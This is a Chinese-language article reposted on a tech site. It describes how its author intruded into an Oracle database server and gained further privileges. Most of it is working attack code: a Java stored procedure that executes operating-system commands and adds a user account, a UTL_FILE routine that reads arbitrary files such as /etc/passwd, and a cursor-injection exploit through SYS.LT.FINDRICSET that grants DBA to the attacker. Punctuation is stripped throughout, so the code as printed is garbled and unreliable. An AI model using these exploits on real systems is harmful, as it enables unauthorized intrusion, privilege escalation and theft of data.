熱點推薦:
您现在的位置: 電腦知識網 >> 編程 >> Oracle >> 正文

入侵Oracle服務器進一步獲取權限

2013-11-13 15:27:41  來源: Oracle 

  很快便連接上oracle服務器此時發現

  連接後不是dba權限

  不能利用SYSDBMS_EXPORT_EXTENSIONGET_DOMAIN_INDEX_TABLES漏洞提升權限

  運行SELECT UTL_HTTPrequest() FROM dual 後發現oracle服務器不能連接網絡

  幸運的是

  運行

  create or replace function Linx_Query (p varchar) return number authid current_user is begin execute immediate p; return ;end;

  成功!這個用戶具有create proceduce權限

  此時馬上想到創建java擴展執行命令

  create or replace and compile java source named LinxUtil as import javaio*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( RuntimegetRuntime()exec(args)getInputStream() ) ); String stempstr=;while ((stemp = myReaderreadLine()) != null) str +=stemp+ ;myReaderclose();return str;} catch (Exception e){return etoString();}}}

  begin dbms_javagrant_permission(PUBLIC SYS:javaioFilePermission <> execute );end;

  create or replace function LinxRunCMD(p_cmd in varchar) return varchar as language java name LinxUtilrunCMD(javalangString) return String

  select * from all_objects where object_name like %LINX%

  grant all on LinxRunCMD to public

  select LinxRunCMD(cmd /c net user linx /add) from dual

  但是在第一步就卡住了服務器由於某種未知原因 不能創建java擴展!!

  還好我們還有UTL庫可以利用

  create or replace function LinxUTLReadfile (filename varchar) return varchar is

  fHandler UTL_FILEFILE_TYPE;

  buf varchar();

  output varchar();

  BEGIN

  fHandler := UTL_FILEFOPEN(UTL_FILE_DIR filename r);

  loop

  begin

  utl_fileget_line(fHandlerbuf);

  DBMS_OUTPUTPUT_LINE(Cursor: ||buf);

  exception

  when no_data_found then exit;

  end;

  output := output||buf||chr();

  end loop;

  UTL_FILEFCLOSE(fHandler);

  return output;

  END;

  UTL_FILE_DIR需要先用

  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;

  指定目但運行後發現沒有權限只好想辦法提權

  ***************游標注射***************

  老外寫了N個pdf介紹這技術我精簡了代碼

  DECLARE

  MYC NUMBER;

  BEGIN

  MYC := DBMS_SQLOPEN_CURSOR;

  DBMS_SQLPARSE(MYCdeclare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user;commit;end;);

  DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);

  BEGIN SYSLTFINDRICSET(||dbms_sqlexecute( ||MYC|| )||)–x); END;

  raise NO_DATA_FOUND;

  EXCEPTION

  WHEN NO_DATA_FOUND THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);

  WHEN OTHERS THEN DBMS_OUTPUTPUT_LINE(Cursor: ||MYC);

  END;

  運行後重新連接就有dba權限了簡單吧……

  現在可以讀取文件了

  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc;

  select LinxUTLReadfile(passwd) from dual

  後面就簡單了不寫了


From:http://tw.wingwit.com/Article/program/Oracle/201311/16747.html
    推薦文章
    Copyright © 2005-2013 電腦知識網 Computer Knowledge   All rights reserved.